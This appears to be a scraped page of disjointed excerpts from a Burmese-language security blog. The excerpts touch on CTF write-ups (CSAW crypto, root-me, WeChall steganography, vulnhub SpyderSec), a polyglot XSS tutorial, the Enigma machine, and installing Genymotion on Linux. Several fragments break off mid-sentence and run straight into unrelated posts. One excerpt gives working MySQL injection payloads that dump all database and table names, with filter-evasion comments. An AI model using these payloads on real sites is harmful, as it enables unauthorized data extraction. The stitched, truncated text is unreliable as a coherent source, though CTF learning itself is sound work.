CTF ေျဖတာ၀ါသနာပါတဲ့ သူေတြအတြက္ ေလ့လာရင္းျပန္မွ်ေ၀ေပးလိုက္ပါတယ္။ CSAW 2015 တုန္းက Crypto Challange 3 ခုကို writeup ေလးျပန္ေရးေပးထားတာပါ။ စိတ္၀င္စားတဲ့သူေတြေလ့လာလို႕ရတာေပါ့။ က်ေနာ္သိထားသေလာက္ေတာ့ CTF တို႕ Challenge တို႕ေျဖတာက အေတြ႕အၾကံဳေလးအေရးပါတယ္လို႕ထင္တယ္။ ေျဖေနၾကသူက ဘယ္လိုေလးေတြေမးတတ္တယ္ဆိုတာကို သိထားေတာ့ လိုအပ္တဲ့ Tools ေလးေတြစုထားတာမ်ိဳး ဘယ္လိုပံုစံဆိုရင္ျဖင့္ဘယ္လို ဆိုတာကို ေတြ႕ဖူးေနေတာ့ ပိုအဆင္ေျပမယ္လို႕ထင္ပါတယ္။ Tricks ေတြကအဓိကက်တာေၾကာင့္လို႕လည္း ေျပာလို႕ရပါတယ္။ ဒါေၾကာင့္ ျပန္ေျဖၾကည့္ၾကတာေပါ့။ ဒါေလးေတြကလြယ္တဲ့ထဲမွာပါပါတယ္။ ဒီလိုပဲလြယ္တာကစရတာပဲဆိုေတာ့ စလိုက္ၾကရေအာင္
What is Polyglot ? Polyglot ဆိုတာျမန္မာလိုဆိုရင္ ဘာသာစကားအမ်ိဳးမ်ိဳးပါေသာလို႕ ဆိုပါတယ္
ဟုတ္ပါတယ္။ က်ေနာ္တို႕လည္း language အမ်ိဳးမ်ိဳးကိုသံုးျပီး XSS Vector တစ္ခုကိုတည္ေဆာက္
မွာပါ။ ဘာကိုဆိုလိုတာလဲဆိုရင္ေတာ့ Polyglot XSS vector ဟာ ၾကိဳတင္ျပင္ဆင္ထားတာျဖစ္တဲ့အတြက္
ကိုယ့္ရဲ႕လက္စြဲ လက္နက္တစ္ခုလို အၾကိဳက္ျပင္ဆင္ထားတဲ့ Vector မ်ိဳးပါ။ ကိုယ္တိုင္တည္ေဆာက္မယ္
ဆိုေတာ့ကာ သူမ်ားေတြဘယ္လိုတည္ေဆာက္လဲဆိုတာကိုအရင္ေလ့လာမွျဖစ္မွာေပါ့ေလ။
ဘယ္လိုအခ်ိန္ေတြမွာသံုးလို႕အဆင္ေျပမလဲ? ဒီေမးခြန္းအတြက္ အဓိကက်ေနာ္ေျပာခ်င္တာကေတာ့
Character Limit လုပ္မထားတဲ့ေနရာတိုင္းမွာသံုးႏိုင္ပါတယ္။ ဒါကိုသံုးတဲ့အတြက္ ဘာေတြထူးႏိုင္မလဲ။
ထူးတာေပါ့ သူကျပင္ဆင္ထားတဲ့ vector ျဖစ္တဲ့အတြက္ ပထမအခ်က္အခ်ိန္ကုန္သက္သာေစတာေပါ့။
ကိုယ္တိုင္စိတ္တိုင္းက်ျပင္ဆင္ဖို႕အတြက္ကေတာ့ ကိုယ္က Common Filter ေတြ ျဖတ္တတ္တဲ့ သေဘာတရား
ေတြကိုသိထားရမယ္။
Step 1 #
ကိုယ္ Inject လုပ္လိုက္တဲ့ vector ဟာ ေတာ္ေတာ္မ်ားမ်ား Website ေတြမွာ html tag တစ္ခုခုတည္းကိုေရာက္သြားတာ
Challenge ကေတာ့ ေခါင္းစဥ္ဖတ္လိုက္တာနဲ့ Password ကို အသံုးမ်ားတဲ့ password ေပးမယ္ဆိုတာ ခန့္မွန္းမိပါတယ္။ဒါေပမယ့္ အလြယ္ေလးေတြလည္းေပးနိုင္ပါတယ္ ဥပမာ 12345. ေနာက္ျပီး weak password လို့ေျပာထားတာေျကာင့္ character length 5 လံုးထက္မပိုနိုင္ေလာက္ပါေတာ့ဘူး ဒါေပမယ့္ Brute-force attack လည္းျဖစ္နိုင္ပါတယ္။ ေသခ်ာတာကေတာ့ အေျဖရဲ့ 50% ကေမးခြန္းမွာပါလာတတ္ပါတယ္ ။။
Ok. ဒါဆိုကြ်န္ေတာ္တို့ Challenge ေခါ္ထားတဲ့ link ကိုသြားျကည့္ရေအာင္.
http://challenge01.root-me.org/web-serveur/ch3/
ဒီေန႕ေတာ့ က်ေနာ္စိတ္လည္းအရမ္းပါေနတာနဲ႕ Enigma Machine အေၾကာင္းကိုေရးဖို႕ ဆံုးျဖတ္လိုက္ပါတယ္။ က်ေနာ္ရွာၾကည့္ရသေလာက္ Enigma Machine ကို ျမန္မာလိုေသေသခ်ာခ်ာရွင္းထားတာတစ္ခါမွမေတြ႕ဖူးဘူး။ ဒါေၾကာင့္ က်ေနာ္႕ညီအကိုေတြနားလည္ေအာင္ အေသးစိတ္ေလးေရးေပးဖို႕ဆံုးျဖတ္လိုက္ပါတယ္။ Tutorial ကလည္းမေရးတာၾကာျပီမလား ။
Enigma အေၾကာင္းကို The Immitation Game ဆိုတဲ့ ရုပ္ရွင္ကားမွာက်ေနာ္စျပီးရင္းႏွီးခဲ့တာပါ။ သူ႕ရဲ႕ေနာက္ခံသမိုင္းေၾကာင္းအတြက္ကိုေတာ့ အဲဒီရုပ္ရွင္ကားကိုၾကည့္ဖူးတယ္ဆိုရင္ သိျပီးေနေလာက္ပါျပီ။ မသိေသးဘူးဆိုရင္လည္း ကိုယ့္ဖာသာ ၾကည့္လိုက္ေတာ့ေနာ္။ ထည့္ေျပာေနရင္ အရမ္းရွည္သြားမယ္ေလ။
ဟုတ္ျပီ။ ေအာက္မွာျပထားတဲ့ပံုကေတာ့ Enigma Machine ရဲ႕ပံုပါ။
After learning about the steganography i decided to write some basic solution on creatigon blog. it is easy but easy is good for first step. we will write other ctfs(Capture The Flag) and Challenges on the internet.
Challenger given the file in below link.
https://www.wechall.net/challenge/training/stegano1/stegano1.bmp
Download file and check with strings command .
I see the password. It is so easy!.
Hello! Everyone. Nice to meet u. Today we ( 133730 , System , 404 ) are try to solve about the SpyderSec Challenge from vulnhub.It really nice challenge and we have new experience about the truecrypt. We want to share our knowledge about this challenge.So writ up about this
Show All Database
1 |
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=/*!50000concat*/(@a,schema_name,'<br>'))))a) |
Show All Tables
1 |
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where (@a)in (@a:=/*!50000concat*/(@a,table_name,'<br>'))))a) |
COC ေဆာ့တဲ့သူေတြမ်ားလာေတာ့ Linux မွာေဆာ့ခ်င္တဲ့ သူငယ္ခ်င္းေတြလည္း ေဆာ့လို႕ရမယ့္နည္းေလးတင္ေပးလိုက္ပါတယ္။
Install Android Emulator on Linux
လူသံုးမ်ားတဲ့ BlueStack က Linux ကို support မလုပ္ပါဘူး။ ဒါေပမယ့္ BlueStack ထက္မုိက္ျပီး၊ Function လည္းစံု Window,Linux,Mac သံုးခုလံုးမွာပါ support လုပ္တဲ့ Genymotion Emulator ကို Linux ေပၚမွာ install လုပ္ျပမွာပါ။ Genymotion ရဲ႕အားနည္းခ်က္က Virtual Box နဲ႕တြဲမွ အလုပ္လုပ္ႏိုင္တာပါ။ ဒါေၾကာင့္ ကိုယ့္စက္မွာ V-box ေတာ့ install လုပ္ျပီးသားရွိရပါလိမ့္မယ္။